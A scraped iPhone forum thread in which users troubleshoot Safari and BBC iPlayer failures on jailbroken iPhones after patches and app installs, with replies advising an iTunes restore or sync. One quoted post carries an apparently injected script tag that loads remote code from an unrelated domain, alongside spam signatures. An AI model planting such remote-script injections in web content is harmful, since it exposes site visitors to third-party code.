Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: help with safari

Unhappy help with safari
    can somebody help me?i installed a patch for safari and now it doesnt work any more,i already uninstalled it and reinstalled it and back uninstall but my safari still wont work.its not my connection cos i can download and update....

did you try a restore? or resynchronizing?
    Last edited by TuNiX; 10-12-2008 at 01:59 PM.

Default ok
    thanks i use it on my pc,but can i get it on my iphone?and how do i install it?

thanx

Umm...... it comes on your iPhone.

It's the default browser if that's what you mean.
    Get streetwear for cheap here.

Quote Originally Posted by jeffry1975 View Post
    can somebody help me?i installed a patch for safari and now it doesnt work any more,i already uninstalled it and reinstalled it and back uninstall but my safari still wont work.its not my connection cos i can download and update....<script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    sync it to your Itunes. itunes will do it for you

Default Help Again with Safari
    Hi there am a new member and really need help. Alls been fine wityh my iphone so far untill..!

iPhone 2G 3.1 firmware
    Jailbroke with pwnage installed cydia..ok stats aside..!

I usually use bbc iplayer occasionally, however it wont work anymore in safari. I do not get the quick time logo anymore and a white box comes up telling me to either download or play with media player and also red small text telling the locations underneath. When i click download nothing downloads and when i click media player it says server not configured properlly.

This all started when i installed some new apps, however when i uninstalled them it remained the same.
    the apps i installed where; dtunes, iheroes, freelix and terminal.

I tried uninstslling the safari plugin because i thought it could be an issue left over, but nothing i do makes a difference.

Also sry to be a pain, but if the only way to fix it is a fresh restore in itunes, then can i use the custom firmware i made on my frinds mac on my itunes on windows?

Many thanks if someone can help.....!

sold the problm it was dues to uninstaslled app stuff let in iphone ..only way was to restore usng custom firmware.

Custom firmware ceated on macs can be used to restore iphones on windows pc's using itunes...
    Last edited by saidmalachi; 10-03-2009 at 03:50 AM. Reason: Automerged Doublepost

iPhoneaholic
    Thanks

Safari is hopeless, Firefox is better but still not as good as it was.
    I installed BBC iPlayer desktop so I could watch downloads but that was useless. So stop using it and get something else.
    mod/edit links removed